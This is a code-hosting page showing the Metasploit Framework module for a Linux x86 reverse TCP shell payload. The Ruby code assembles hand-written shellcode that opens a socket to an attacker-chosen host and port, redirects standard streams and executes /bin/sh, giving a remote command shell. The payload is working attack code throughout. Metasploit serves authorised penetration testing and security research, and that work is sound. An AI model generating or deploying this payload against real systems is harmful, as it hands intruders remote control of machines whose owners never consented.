Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb
19851 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
module MetasploitModule

7
  CachedSize = 68

8


9
  include Msf::Payload::Single

10
  include Msf::Payload::Linux::X86::Prepends

11
  include Msf::Sessions::CommandShellOptions

12


13
  def initialize(info = {})

14
    super(

15
      merge_info(

16
        info,

17
        'Name' => 'Linux Command Shell, Reverse TCP Inline',

18
        'Description' => 'Connect back to attacker and spawn a command shell',

19
        'Author' => ['Ramon de C Valle', 'joev'],

20
        'License' => MSF_LICENSE,

21
        'Platform' => 'linux',

22
        'Arch' => ARCH_X86,

23
        'Handler' => Msf::Handler::ReverseTcp,

24
        'Session' => Msf::Sessions::CommandShellUnix

25
      )

26
    )

27


28
    register_options([

29
      OptString.new('CMD', [ true, 'The command string to execute', '/bin/sh' ])

30
    ])

31
  end

32


33
  def generate(_opts = {})

34
    # pad the shell path to a multiple of 4 with slashes

35
    shell = datastore['CMD']

36
    remainder = shell.bytes.length % 4

37
    if remainder == 0 then remainder = 4 end

38
    shell_padded = ('/' * (4 - remainder)) + shell

39


40
    "\x31\xdb" + #   xor ebx,ebx

41
      "\xf7\xe3" + #   mul ebx

42
      "\x53" + #   push ebx

43
      "\x43" + #   inc ebx

44
      "\x53" + #   push ebx

45
      "\x6a\x02" + #   push byte +0x2

46
      "\x89\xe1" + #   mov ecx,esp

47
      "\xb0\x66" + #   mov al,0x66 (sys_socketcall)

48
      "\xcd\x80" + #   int 0x80

49
      "\x93" + #   xchg eax,ebx

50
      "\x59" + #   pop ecx

51
      "\xb0\x3f" + #   mov al,0x3f (sys_dup2)

52
      "\xcd\x80" + #   int 0x80

53
      "\x49" + #   dec ecx

54
      "\x79\xf9" + #   jns 0x11

55
      "\x68" + [IPAddr.new(datastore['LHOST'], Socket::AF_INET).to_i].pack('N') + #   push ip addr

56
      "\x68\x02\x00" + [datastore['LPORT'].to_i].pack('S>') + #   push port

57
      "\x89\xe1" + #   mov ecx,esp

58
      "\xb0\x66" + #   mov al,0x66 (sys_socketcall)

59
      "\x50" + #   push eax

60
      "\x51" + #   push ecx

61
      "\x53" + #   push ebx

62
      "\xb3\x03" + #   mov bl,0x3

63
      "\x89\xe1" + #   mov ecx,esp

64
      "\xcd\x80" + #   int 0x80

65
      "\x52" + #   push edx

66


67
      # Split shellname into 4-byte words and push them one-by-one

68
      # on to the stack

69
      shell_padded.bytes.reverse.each_slice(4).map do |word|

70
        "\x68" + word.reverse.pack('C*')

71
      end.join +

72
      "\x89\xe3" + #   mov ebx,esp

73
      "\x52" + #   push edx

74
      "\x53" + #   push ebx

75
      "\x89\xe1" + #   mov ecx,esp

76
      "\xb0\x0b" + #   mov al,0xb (execve)

77
      "\xcd\x80" #   int 0x80

78
  end

79
end

80


81